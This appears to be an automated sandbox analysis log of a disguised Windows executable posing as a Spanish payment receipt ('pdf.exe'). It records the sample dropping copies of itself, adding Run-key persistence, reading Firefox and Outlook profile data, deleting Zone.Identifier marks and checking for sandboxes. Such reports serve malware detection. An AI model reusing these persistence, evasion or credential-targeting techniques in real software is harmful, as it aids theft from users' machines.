                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeReversingLabs: Detection: 34%
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile read: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess created: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe "C:\Users\user\AppData\Roaming\Reramvw.exe"
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeProcess created: C:\Users\user\AppData\Roaming\Reramvw.exe C:\Users\user\AppData\Roaming\Reramvw.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\repeat\repeat.exe "C:\Users\user\AppData\Roaming\repeat\repeat.exe"
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess created: C:\Users\user\AppData\Roaming\repeat\repeat.exe C:\Users\user\AppData\Roaming\repeat\repeat.exe
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: protobuf-net.pdbSHA256}Lq source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: protobuf-net.pdb source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmp

                            Data Obfuscation

                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.41895b0.7.raw.unpack, ParamMockWriter.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, Template.cs.Net Code: DisableTemplate System.AppDomain.Load(byte[])
                            Source: Reramvw.exe.0.dr, Template.cs.Net Code: DisableTemplate System.AppDomain.Load(byte[])
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.67c0000.10.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.67c0000.10.raw.unpack, ListDecorator.cs.Net Code: Read
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.67c0000.10.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.67c0000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.67c0000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40f9570.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40f9570.5.raw.unpack, ListDecorator.cs.Net Code: Read
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40f9570.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40f9570.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40f9570.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40a9550.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40a9550.3.raw.unpack, ListDecorator.cs.Net Code: Read
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40a9550.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40a9550.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.40a9550.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.3383018.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.repeat.exe.2bf2c1c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Reramvw.exe.3cd3160.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Reramvw.exe.3bbb5d0.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.repeat.exe.3bc3160.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.6780000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.Reramvw.exe.27ee91c.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.repeat.exe.39f95b0.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.repeat.exe.37cb5d0.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.Reramvw.exe.36ab5d0.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.Reramvw.exe.37c3160.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.Reramvw.exe.35f95b0.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.repeat.exe.37195b0.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Reramvw.exe.2d02bc8.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.423b5d0.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.repeat.exe.3aab5d0.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.41895b0.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.repeat.exe.290e980.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.repeat.exe.38e3160.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Reramvw.exe.3b095b0.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.42793f0.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.41895b0.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000B.00000002.2413286495.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2156621801.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992000502.0000000003308000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2237006260.0000000003BC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2408937601.000000000288F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2237006260.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2408937601.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2156621801.0000000003CD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1995757334.0000000006780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2334210822.00000000037C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2152875189.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2233090518.000000000296E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2328135287.000000000256E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2413286495.00000000038E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2334210822.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2233090518.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992695119.0000000004172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992000502.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2328135287.000000000276F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: JUSTIFICANTE DE PAGO CF.pdf.exe PID: 2360, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 7128, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 7056, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 6472, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 6844, type: MEMORYSTR
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 0_2_07196D6F push ebp; ret 0_2_07196D70
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_02E096E0 push esp; ret 2_2_02E09BF9
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_06417890 push es; ret 2_2_064178A0
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_0642E6F8 pushad ; ret 2_2_0642E8A1
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 3_2_06C56D6F push ebp; ret 3_2_06C56D70
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_018D9A48 push eax; ret 6_2_018D9BE9
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_05FD7890 push es; ret 6_2_05FD78A0
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_0689E6F0 pushad ; ret 6_2_0689E899
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 7_2_069C6D6F push ebp; ret 7_2_069C6D70
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_02EB9689 push esp; retn 0557h8_2_02EB9AC9
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_05DCE380 pushad ; ret 8_2_05DCE529
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 9_2_06436D6F push ebp; ret 9_2_06436D70
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_06317428 push es; ret 10_2_063178A0
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_06317890 push es; ret 10_2_063178A0
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_0632E6F0 pushad ; ret 10_2_0632E899
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 11_2_06766D6F push ebp; ret 11_2_06766D70
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_015A9605 push esp; retn 02EDh12_2_015A9AC9
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_06577280 push es; ret 12_2_06577290
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_0659E380 pushad ; ret 12_2_0659E529
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile created: C:\Users\user\AppData\Roaming\Reramvw.exeJump to dropped file
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile created: C:\Users\user\AppData\Roaming\repeat\repeat.exeJump to dropped file

                            Boot Survival

                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ReramvwJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run repeatJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile opened: C:\Users\user\AppData\Roaming\repeat\repeat.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeFile opened: C:\Users\user\AppData\Roaming\repeat\repeat.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: Possible double extension: pdf.exeStatic PE information: JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe Process information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.0000000003308000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.000000000296E000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.000000000256E000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.000000000276F000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000288F000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe Memory allocated: 15C0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe Memory allocated: 30A0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe Memory allocated: 50A0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe Memory allocated: 2C10000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe Memory allocated: 2E90000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe Memory allocated: 2C10000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe Memory allocated: 2960000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe Memory allocated: 2A20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe Memory allocated: 2960000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe Memory allocated: 18D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe Memory allocated: 32D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe Memory allocated: 3120000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: F60000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 2910000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 4910000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 2EB0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 30A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 2EE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 750000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 2510000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 21E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 2C50000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 2ED0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeMemory allocated: 2CD0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 24A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 2630000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 4630000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 15A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 3010000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeMemory allocated: 5010000 memory reserve | memory write watch
